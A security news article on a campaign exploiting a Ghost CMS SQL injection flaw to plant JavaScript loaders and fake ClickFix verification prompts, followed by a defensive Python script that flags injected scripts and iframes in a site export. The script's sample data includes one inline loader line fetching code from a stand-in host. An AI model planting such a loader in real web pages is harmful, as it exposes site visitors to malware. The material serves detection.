Ghost CMS SQL injection flaw exploited in large-scale ClickFix campaign
By Bill Toulas, May 24, 2026, 10:12 AM
A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows.
The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.
According to the researchers, threat actors planted malicious code on the websites of Harvard University, Oxford University, Auburn University, and DuckDuckGo.
[Figure: Compromised sites. Source: XLab]
CVE-2026-26980 impacts Ghost 3.24.0 through 6.19.0 and allows unauthenticated attackers to read arbitrary data from the website database, including the admin API keys.
These keys give management access to users, articles, and themes, and can be used to modify article pages.
Although the fix for the issue was released on February 19 in Ghost CMS version 6.19.1, many sites failed to install the security update.
On February 27, SentinelOne published details of CVE-2026-26980 being exploited in attacks and of how such incidents can be detected. The researchers observed at least two distinct activity clusters targeting vulnerable Ghost sites, sometimes re-infecting the same domains with different scripts after cleanup, or one cluster removing the other's script in order to inject its own.
[Figure: Timeline of the attacks. Source: XLab]
Attack chain
The attacks that XLab observed begin by exploiting CVE-2026-26980 to steal the admin API keys, and then use the elevated rights to inject malicious JavaScript into articles.
The JavaScript code is a lightweight loader that fetches second-stage code from the attacker’s infrastructure, which is essentially a cloaking script that fingerprints visitors to determine whether they qualify as targets.
Visitors passing the verification are served a fake Cloudflare prompt loaded via an iframe on top of the article page, which contains the ClickFix lure.
[Figure: The ClickFix page. Source: XLab]
The page instructs victims to verify that they are human by pasting a provided command into their Windows command prompt, which drops a payload onto their systems.
XLab has observed multiple payloads being used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.
[Figure: Attack phases. Source: XLab]
Mitigating the risk
The most important course of action for Ghost CMS website administrators is to upgrade to version 6.19.1 or later and rotate all keys used previously, as they may have been exposed.
XLab provided a list of indicators of compromise (IoCs), including injected scripts, so a thorough review of the websites is needed to locate and remove them.
The researchers recommend that website owners maintain a 30-day record of admin API call logs to enable a reliable retrospective investigation.
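The two defender tasks the article calls for (checking whether a site falls in the affected version range, and reviewing published articles for injected script loaders and overlay iframes) can be turned into a small triage script. The following is an added example written for this page; it is not XLab's or SentinelOne's tooling and not Ghost's own code. It assumes the Ghost content export is JSON shaped as `{"db": [{"data": {"posts": [{"slug", "html"}]}}]}` and that the site owner knows which third-party script hosts their articles legitimately embed; the sample export, the hosts `cdn.example.org`, `loader.invalid` and `verify.invalid`, and the `is_affected_version`/`scan_export` helper names are all constructed for the example.

```python
"""Triage helpers for a Ghost CMS site after the CVE-2026-26980 campaign.

Constructed example. Assumes (not stated in the article) that a Ghost content
export is JSON of the form {"db": [{"data": {"posts": [{"slug": ..., "html": ...}]}}]}.
"""
import json
import re
from urllib.parse import urlparse

# Affected range as stated in the article: Ghost 3.24.0 through 6.19.0, fixed in 6.19.1.
FIRST_AFFECTED = (3, 24, 0)
FIRST_FIXED = (6, 19, 1)

SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
IFRAME_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*[\"']([^\"']+)", re.IGNORECASE)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']([^\"']+)", re.IGNORECASE)


def parse_version(version: str) -> tuple:
    """Turn '6.19.0' (optionally 'v'-prefixed, optionally short) into a 3-tuple."""
    parts = [int(p) for p in version.lstrip("v").split(".")[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected_version(version: str) -> bool:
    """True when the running Ghost version lies in the range the article gives."""
    return FIRST_AFFECTED <= parse_version(version) < FIRST_FIXED


def find_injected_content(post_html: str, allowed_hosts: set) -> list:
    """Flag script/iframe elements in one article that the owner did not sanction.

    - external <script src=...> from a host outside allowed_hosts -> 'external-script'
    - inline <script> bodies (how a lightweight loader is typically planted) -> 'inline-script'
    - <iframe src=...> from a host outside allowed_hosts (fake-verification overlay) -> 'iframe'
    Same-origin (relative) sources are treated as the site's own and not flagged.
    """
    findings = []
    for attrs, body in SCRIPT_RE.findall(post_html):
        src = SRC_RE.search(attrs)
        if src:
            host = urlparse(src.group(1)).hostname or ""
            if host and host not in allowed_hosts:
                findings.append(("external-script", src.group(1)))
        elif body.strip():
            findings.append(("inline-script", body.strip()[:80]))
    for src in IFRAME_RE.findall(post_html):
        host = urlparse(src).hostname or ""
        if host and host not in allowed_hosts:
            findings.append(("iframe", src))
    return findings


def scan_export(export_json: str, allowed_hosts: set) -> dict:
    """Map post slug -> findings for every post in a Ghost content export."""
    report = {}
    for db in json.loads(export_json)["db"]:
        for post in db.get("data", {}).get("posts", []):
            hits = find_injected_content(post.get("html") or "", allowed_hosts)
            if hits:
                report[post["slug"]] = hits
    return report


# Constructed sample export: one clean post, one with an inline loader, one with an overlay iframe.
SAMPLE_EXPORT = json.dumps({"db": [{"data": {"posts": [
    {"slug": "welcome",
     "html": "<p>Hello</p><script src=\"https://cdn.example.org/embed.js\"></script>"},
    {"slug": "quarterly-update",
     "html": "<p>Numbers</p><script>(function(){var s=document.createElement('script');"
             "s.src='https://loader.invalid/x.js';document.head.appendChild(s)})();</script>"},
    {"slug": "tutorial",
     "html": "<h2>Step 1</h2><iframe src=\"https://verify.invalid/check\"></iframe>"},
]}}]})

if __name__ == "__main__":
    for v in ("6.18.0", "6.19.1"):
        print(v, "affected" if is_affected_version(v) else "patched")
    for slug, hits in scan_export(SAMPLE_EXPORT, {"cdn.example.org"}).items():
        print(slug, hits)
```

Run it against a real export taken from the Ghost admin (Settings, Labs, Export) and an allowlist of the hosts your theme and embeds legitimately use; every flagged post should be reviewed by hand, since the campaign re-infected cleaned sites and a second cluster may have replaced the first one's loader.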
Tags: Actively Exploited, ClickFix, Ghost CMS, Social Engineering, SQL Injection, Vulnerability
Bill Toulas
Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.